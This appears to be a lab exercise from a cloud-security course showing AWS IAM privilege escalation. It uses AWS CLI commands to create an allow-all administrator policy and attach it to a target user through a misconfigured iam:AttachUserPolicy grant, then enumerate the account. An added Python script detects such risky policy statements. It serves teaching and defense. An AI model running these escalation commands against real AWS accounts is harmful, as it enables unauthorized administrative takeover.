# 4. Perform Privilege Escalation to Gain Higher Privileges

## 1. Escalate IAM privilege by exploiting misconfigured user policy

A policy is an entity that, when attached to an identity or resource, defines its permissions. You can use the AWS Management Console, AWS CLI, or AWS API to create customer-managed policies in IAM. Customer-managed policies are standalone policies that you administer in your AWS account. You can then attach the policies to the identities (users, groups, and roles) in your AWS account. If the user policies are not configured properly, they can be exploited by attackers to gain full administrator access to the target user’s AWS account.

Before starting this task, create an **IAM** user (**Test**) with default settings and create a policy (**Test**) with permissions including iam:AttachUserPolicy, iam:ListUserPolicies, sts:AssumeRole, and iam:ListRoles, as shown in the screenshot below. These permissions can be exploited by attackers to gain administrator-level privileges.

<figure><img src="/files/kPFXiD8QKrcKxn6Ztats" alt=""><figcaption></figcaption></figure>

In the terminal window, type **vim user-policy.json** and press **Enter**.

> This command will create a file named **user-policy** in the **attacker** directory.

<figure><img src="/files/qaTctNv40xhj5LLpyPy1" alt=""><figcaption></figcaption></figure>

A command line text editor appears; press **I** and type the script given below:

```
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
```

This is an AdministratorAccess policy that gives administrator access to the target IAM user. After entering the script given in the previous step, press the **Esc** button. Then, type **:wq!** and press **Enter** to save the text document.

<figure><img src="/files/FKpjI5GVu5Y39NLnEetI" alt=""><figcaption></figcaption></figure>

Now, we will create the policy (**user-policy**) from this document so that it can be attached to the target IAM user’s account. To do so, type

```
aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json
```

The created user policy is displayed, showing various details such as **PolicyName**, **PolicyId**, and **Arn**.

<figure><img src="/files/DyZimjP8wD6Uq6WHVxwl" alt=""><figcaption></figcaption></figure>

In the terminal, type

```
aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy 
```

The above command will attach the policy (**user-policy**) to the target IAM user account (here, **test**).

<figure><img src="/files/uolN2LMIwb2kJ6iRsile" alt=""><figcaption></figcaption></figure>

Now, type

```
aws iam list-attached-user-policies --user-name [Target Username]
```

It will show all attached policies.

The result appears, displaying the attached policy name (**user-policy**), as shown in the screenshot.

<figure><img src="/files/Ji8GakCZb3eygv0T9rkC" alt=""><figcaption></figcaption></figure>

Now that you have successfully escalated the privileges of the target IAM user account, you can list all the IAM users in the AWS environment. To do so, type **aws iam list-users** and press **Enter**.

<figure><img src="/files/DGX12OPObI1v3lbrQbch" alt=""><figcaption></figcaption></figure>

Similarly, you can use various commands to obtain complete information about the AWS environment such as the list of S3 buckets, user policies, role policies, and group policies, as well as to create a new user.

* List of S3 buckets: **aws s3api list-buckets --query "Buckets\[].Name"**
* User Policies: **aws iam list-user-policies**
* Role Policies: **aws iam list-role-policies**
* Group policies: **aws iam list-group-policies**
* Create user: **aws iam create-user**
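
The escalation in this lab works because the **Test** policy grants `iam:AttachUserPolicy` on every resource with no condition. The following Python check is an added example, not part of the original lab: it flags such statements in a policy document so they can be found during a review. The sample policies, the `iam:PolicyARN`-restricted variant, and the account ID and policy name in it are constructed for illustration.

```python
import fnmatch
import json

RISKY_ACTION = "iam:AttachUserPolicy"  # the permission the lab abuses

def _as_list(value):
    """IAM accepts a single value or a list for Statement, Action and NotAction."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _matches(pattern, action):
    # IAM action names are case-insensitive and may contain * and ? wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())

def allows_action(stmt, action=RISKY_ACTION):
    if stmt.get("Effect") != "Allow":
        return False
    if "NotAction" in stmt:  # Allow + NotAction grants everything not listed
        return not any(_matches(p, action) for p in _as_list(stmt["NotAction"]))
    return any(_matches(p, action) for p in _as_list(stmt.get("Action")))

def is_constrained(stmt):
    """Heuristic: an iam:PolicyARN condition key is present (its value is not evaluated)."""
    return any(key.lower() == "iam:policyarn"
               for block in stmt.get("Condition", {}).values() for key in block)

def find_escalation_statements(policy_json):
    """Return (index, Sid) of Allow statements that grant unconstrained AttachUserPolicy."""
    statements = _as_list(json.loads(policy_json).get("Statement"))
    return [(i, s.get("Sid", "<no Sid>")) for i, s in enumerate(statements)
            if allows_action(s) and not is_constrained(s)]

# Constructed sample: the lab's "Test" policy with the four permissions listed above.
LAB_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Resource": "*",
    "Action": ["iam:AttachUserPolicy", "iam:ListUserPolicies", "sts:AssumeRole", "iam:ListRoles"]}]})

# Constructed sample: list permissions kept, attach limited to one placeholder policy ARN.
HARDENED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "ReadOnly", "Effect": "Allow", "Resource": "*",
     "Action": ["iam:ListUserPolicies", "iam:ListRoles"]},
    {"Sid": "AttachApprovedOnly", "Effect": "Allow", "Resource": "*",
     "Action": "iam:AttachUserPolicy",
     "Condition": {"ArnEquals": {"iam:PolicyARN": "arn:aws:iam::111122223333:policy/approved-readonly"}}}]})

if __name__ == "__main__":
    print("lab policy findings:     ", find_escalation_statements(LAB_POLICY))
    print("hardened policy findings:", find_escalation_statements(HARDENED_POLICY))
```

The check does not evaluate `Resource` or the value of the condition, so a finding is a prompt for manual review rather than a verdict.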

